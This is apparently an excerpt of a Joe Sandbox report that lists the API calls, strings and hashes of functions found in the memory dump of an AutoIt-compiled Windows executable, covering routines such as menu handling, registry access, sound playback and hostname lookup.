
Part of subcall function 003A4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003A4743,?,?,003A37AE,?), ref: 003A4770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 003A6BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 003A6CFA

Part of subcall function 003A586D: _wcscpy.LIBCMT ref: 003A58A5

Part of subcall function 003C363D: _iswctype.LIBCMT ref: 003C3645

Strings

Unterminated string, xrefs: 003DE7E4
#include depth exceeded. Make sure there are no recursive includes, xrefs: 003DE421
AU3!, xrefs: 003A6B61
Error opening the file, xrefs: 003DE43D, 003DE4B8
>>>AUTOIT SCRIPT<<<, xrefs: 003DE496
EA06, xrefs: 003DE452
Bad directive syntax error, xrefs: 003DE79D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: b2915c6a3a08daa61f028c29f5752d248d1c894ff0fb600abb369b1cf99620c0
Instruction ID: cbb536e4048ec75e8b9304f6c8602c6fbcf432154aecb27eca8b9160ebeee71b
Opcode Fuzzy Hash: b2915c6a3a08daa61f028c29f5752d248d1c894ff0fb600abb369b1cf99620c0
Instruction Fuzzy Hash: BD02C0311083409FC726EF20D881AAFBBE5FF96354F14492EF4959B2A2DB34D949CB52

Function 00402D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00402D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00402DDD
GetMenuItemCount.USER32(00465890), ref: 00402E66
DeleteMenu.USER32(00465890,00000005,00000000,000000F5,?,?), ref: 00402EF6
DeleteMenu.USER32(00465890,00000004,00000000), ref: 00402EFE
DeleteMenu.USER32(00465890,00000006,00000000), ref: 00402F06
DeleteMenu.USER32(00465890,00000003,00000000), ref: 00402F0E
GetMenuItemCount.USER32(00465890), ref: 00402F16
SetMenuItemInfoW.USER32(00465890,00000004,00000000,00000030), ref: 00402F4C
GetCursorPos.USER32(?), ref: 00402F56
SetForegroundWindow.USER32(00000000), ref: 00402F5F
TrackPopupMenuEx.USER32(00465890,00000000,?,00000000,00000000,00000000), ref: 00402F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00402F7E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: ed9230a8a4ff9effd9b3a09cb28a08798388242f2f3b7ea187f0aa69304fa179
Instruction ID: 1b130421985dbfbd6963859cbe8356b95cfa926e0cadc97691687ece671a1cdd
Opcode Fuzzy Hash: ed9230a8a4ff9effd9b3a09cb28a08798388242f2f3b7ea187f0aa69304fa179
Instruction Fuzzy Hash: FB71FF30640206BAEB218B54DD89FAABF64FF04364F10023BF614BA2E1C7F95C54DB99

Function 004188AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004188D7
CoInitialize.OLE32(00000000), ref: 00418904
CoUninitialize.OLE32 ref: 0041890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00418A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00418B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00432C0C), ref: 00418B6F
CoGetObject.OLE32(?,00000000,00432C0C,?), ref: 00418B92
SetErrorMode.KERNEL32(00000000), ref: 00418BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418C25
VariantClear.OLEAUT32(?), ref: 00418C35

Strings

,,C, xrefs: 004188C1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,C
API String ID: 2395222682-418520338
Opcode ID: 12c6c9fb9fbb3e42400be0fc8a7f58ed257f3467276e4a238bf8a37aa49efff9
Instruction ID: bfd208674e5c999ea9ed834b49840878dd17dd4819cc7894046fe1a69bba5f1d
Opcode Fuzzy Hash: 12c6c9fb9fbb3e42400be0fc8a7f58ed257f3467276e4a238bf8a37aa49efff9
Instruction Fuzzy Hash: 16C146B1608305AFC700DF24C88496BB7E9FF89748F00492EF98A9B251DB75ED46CB56

Function 003F77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

_memset.LIBCMT ref: 003F786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003F78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003F78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003F78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003F7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 003F792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003F7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003F793A

Strings

SOFTWARE\Classes\, xrefs: 003F780C
\CLSID, xrefs: 003F7822
\IPC$, xrefs: 003F7882

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 049280e8675536c4331d81dab5d68544589e175dfd3c8d185bda5d8a9e0b41b1
Instruction ID: d3b914ca2990f76f049b543c243220f171939d08f473b6d0b776e05714f88b0e
Opcode Fuzzy Hash: 049280e8675536c4331d81dab5d68544589e175dfd3c8d185bda5d8a9e0b41b1
Instruction Fuzzy Hash: DB410872C1422DABCB22EBA4EC85DEEB778FF18750F404039E905A7162DB745D09CB90

Function 00420E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0041FDAD,?,?), ref: 00420E31

Strings

HKEY_CLASSES_ROOT, xrefs: 00420EC4
HKLM, xrefs: 00420EAF
HKEY_USERS, xrefs: 00420F32
HKCC, xrefs: 00420EFF
HKCU, xrefs: 00420F21
HKCR, xrefs: 00420ED9
HKEY_CURRENT_CONFIG, xrefs: 00420EEE
HKEY_LOCAL_MACHINE, xrefs: 00420E9A
HKEY_CURRENT_USER, xrefs: 00420F10
HKU, xrefs: 00420F43

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 08b3ae8fa1832d11d8edb88abce801337ef94fbc122be30bee791a840a0d548b
Instruction ID: 03a8296f645b02c293d8a2ab56a4079b81e630ca4c7ea1b2b2a96265c508579a
Opcode Fuzzy Hash: 08b3ae8fa1832d11d8edb88abce801337ef94fbc122be30bee791a840a0d548b
Instruction Fuzzy Hash: 1E417C32644259CBCF25EE10E951AEF37A0AF12300F86441AFC615B393DB789D1ACB64

Function 003FF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003DE2A0,00000010,?,Bad directive syntax error,0042F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003FF7C2
LoadStringW.USER32(00000000,?,003DE2A0,00000010), ref: 003FF7C9

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

_wprintf.LIBCMT ref: 003FF7FC
__swprintf.LIBCMT ref: 003FF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003FF88D

Strings

Error: , xrefs: 003FF85B
Line %d:, xrefs: 003FF818
Line %d (File "%s"):, xrefs: 003FF833
%s (%d) : ==> %s.: %s %s, xrefs: 003FF7F7
., xrefs: 003FF873

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: e7543abf8e4fcb4f255543d64835d6f44d45db8fa40eef553501b5c64ed2037d
Instruction ID: 75e7ddf4aca717bf69690c6ef1057f8acff3d5381de0c583d6c60234bf521af8
Opcode Fuzzy Hash: e7543abf8e4fcb4f255543d64835d6f44d45db8fa40eef553501b5c64ed2037d
Instruction Fuzzy Hash: EB215E3290021DABCF12AF90CC4AFEE7739FF14311F44446AF9056A0A2DA359A28DB55

Function 004052C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

Part of subcall function 003A7924: _memmove.LIBCMT ref: 003A79AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00405330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00405346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00405357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00405369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0040537A

Strings

play PlayMe, xrefs: 00405375
close PlayMe, xrefs: 00405341, 0040536E
open , xrefs: 004052DF
status PlayMe mode, xrefs: 0040532B
alias PlayMe, xrefs: 00405309
play PlayMe wait, xrefs: 00405364

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 7b97654e0bfaf89a88ed9ba8611d288579a402edc30912c3bbc625ab9cdb9486
Instruction ID: 7490ef33e2d748bfa92742bec3dcc0eff642949ad4a30ef2bae0618f699c0474
Opcode Fuzzy Hash: 7b97654e0bfaf89a88ed9ba8611d288579a402edc30912c3bbc625ab9cdb9486
Instruction Fuzzy Hash: 76116021A5012D79D724B661CC8AEFF6B7CEB96B41F50042EB801B60D2EEB41D09C9A4

Function 004046B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004046D2
gethostname.WSOCK32(?,00000100), ref: 004046EC
gethostbyname.WSOCK32(?), ref: 004046F9
_wcscpy.LIBCMT ref: 00404721
_memmove.LIBCMT ref: 00404734
inet_ntoa.WSOCK32(?), ref: 0040473F
_strcat.LIBCMT ref: 0040474D
_wcscpy.LIBCMT ref: 00404764
WSACleanup.WSOCK32 ref: 00404772
_wcscpy.LIBCMT ref: 00404780

Strings

0.0.0.0, xrefs: 0040471B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: cb89fb0266c1f197fb3259b9c4e560f2557bfaa4524a424e350db6e3258cbbc8
Instruction ID: cdcc89fab1ec14e1c683a33448e56f3288ffbce0942e59b238a1227a4a0d531a
Opcode Fuzzy Hash: cb89fb0266c1f197fb3259b9c4e560f2557bfaa4524a424e350db6e3258cbbc8
Instruction Fuzzy Hash: 4411F371600114ABCB25AB70AC4AFDB77BCEB81711F4001BAF545E7191EF788D868B58

Function 00404F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00404F7A

Part of subcall function 003C049F: timeGetTime.WINMM(?,75A8B400,003B0E7B), ref: 003C04A3

Sleep.KERNEL32(0000000A), ref: 00404FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00404FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00404FEC
SetActiveWindow.USER32 ref: 0040500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00405019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00405038
Sleep.KERNEL32(000000FA), ref: 00405043
IsWindow.USER32 ref: 0040504F
EndDialog.USER32(00000000), ref: 00405060

Strings

BUTTON, xrefs: 00404FDE

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 0500dd88fac1d08e56536375e69ef8147ea255d1a5e6f4a7eb169935bdc760a2
Instruction ID: 0225ab57496d59b4980e3af9c6e698b0e3c1eeb935cc9c2fca0c821a0538bc0a
Opcode Fuzzy Hash: 0500dd88fac1d08e56536375e69ef8147ea255d1a5e6f4a7eb169935bdc760a2
Instruction Fuzzy Hash: 85218070204605BFE7205F30EC89F2B7A69EB4574DF851039F502A22F1EBB64D558E6E

Function 0040D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

CoInitialize.OLE32(00000000), ref: 0040D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0040D67D
SHGetDesktopFolder.SHELL32(?), ref: 0040D691
CoCreateInstance.OLE32(00432D7C,00000000,00000001,00458C1C,?), ref: 0040D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0040D74C
CoTaskMemFree.OLE32(?,?), ref: 0040D7A4
_memset.LIBCMT ref: 0040D7E1
SHBrowseForFolderW.SHELL32(?), ref: 0040D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040D840
CoTaskMemFree.OLE32(00000000), ref: 0040D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0040D87E
CoUninitialize.OLE32(00000001,00000000), ref: 0040D880

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: f5be75f3dccb634ca4bc15ed84cc3a611b406c63c3b7e31f3e1b0a476e832453
Instruction ID: 4c408c3bea3fb6327849b6f19dfa89bbdc72125c511cccb64fb5648941025bf7
Opcode Fuzzy Hash: f5be75f3dccb634ca4bc15ed84cc3a611b406c63c3b7e31f3e1b0a476e832453
Instruction Fuzzy Hash: 87B12B75A00109AFDB14DFA4C888EAEBBB9FF49314F108469F909EB261DB34ED45CB54

Function 003FC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 003FC283
GetWindowRect.USER32(00000000,?), ref: 003FC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003FC2F3
GetDlgItem.USER32(?,00000002), ref: 003FC2FE
GetWindowRect.USER32(00000000,?), ref: 003FC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003FC364
GetDlgItem.USER32(?,000003E9), ref: 003FC372
GetWindowRect.USER32(00000000,?), ref: 003FC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003FC3C6
GetDlgItem.USER32(?,000003EA), ref: 003FC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003FC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 003FC3FE

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: b5341f73e6ddb0cbcfd5e189dce4d8623a59a9bc02f3b9c9a565c416e274f9e2
Instruction ID: e9c463921313db3e346689e0aeadd99ed36afe619eab122af19c611059e5c03b
Opcode Fuzzy Hash: b5341f73e6ddb0cbcfd5e189dce4d8623a59a9bc02f3b9c9a565c416e274f9e2
Instruction Fuzzy Hash: 80517F71B00209AFDB18CFA9DD89EAEBBBAEB88710F54813DF615D7290D7709D058B14

Function 003A201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 003A1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003A2036,?,00000000,?,?,?,?,003A16CB,00000000,?), ref: 003A1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003A20D3
KillTimer.USER32(-00000001,?,?,?,?,003A16CB,00000000,?,?,003A1AE2,?,?), ref: 003A216E
DestroyAcceleratorTable.USER32(00000000), ref: 003DBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003A16CB,00000000,?,?,003A1AE2,?,?), ref: 003DBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003A16CB,00000000,?,?,003A1AE2,?,?), ref: 003DBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003A16CB,00000000,?,?,003A1AE2,?,?), ref: 003DBD0A
DeleteObject.GDI32(00000000), ref: 003DBD1C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: f01ade91d10486b89e3d5a1fbfc0ee52db252d33ee727648fb834e25c202ba12
Instruction ID: 5201d84c4f308d8dc12776ceeed52299dfea05099e25c2c7a7232dc9912422a3
Opcode Fuzzy Hash: f01ade91d10486b89e3d5a1fbfc0ee52db252d33ee727648fb834e25c202ba12
Instruction Fuzzy Hash: CA619F31500A01DFCB36EF18D948B2AB7F2FF41312F92853AE4424BA70D7B5A895DB95

Function 003A21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 003A25DB: GetWindowLongW.USER32(?,000000EB), ref: 003A25EC

GetSysColor.USER32(0000000F), ref: 003A21D3

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 3ff43163f7912bbe3057a4481a396c615baff42eac7ec138200e384a2d1f965d
Instruction ID: f23eb0c59101bc72903f49da98d3fe97b2ac5cb7743af722bf63319e34032ff2
Opcode Fuzzy Hash: 3ff43163f7912bbe3057a4481a396c615baff42eac7ec138200e384a2d1f965d
Instruction Fuzzy Hash: 65419031100154EADB265F2CEC88BBA3B66EB07321F964275FD658A1E2C7318C42DB25

Function 0040A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0042F910), ref: 0040A90B
GetDriveTypeW.KERNEL32(00000061,004589A0,00000061), ref: 0040A9D5
_wcscpy.LIBCMT ref: 0040A9FF

Strings

network, xrefs: 0040A969
unknown, xrefs: 0040A996
all, xrefs: 0040A911
removable, xrefs: 0040A93D
cdrom, xrefs: 0040A927
ramdisk, xrefs: 0040A97F
fixed, xrefs: 0040A953

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 08f5c702fdb74e379639f5cdde816d9e057322c4afa4103aa77e20e2bac0c0fe
Instruction ID: ac85be68d72bf77837d1b17f27c17adf32bc8636c7bc97645b988e150df07ac4
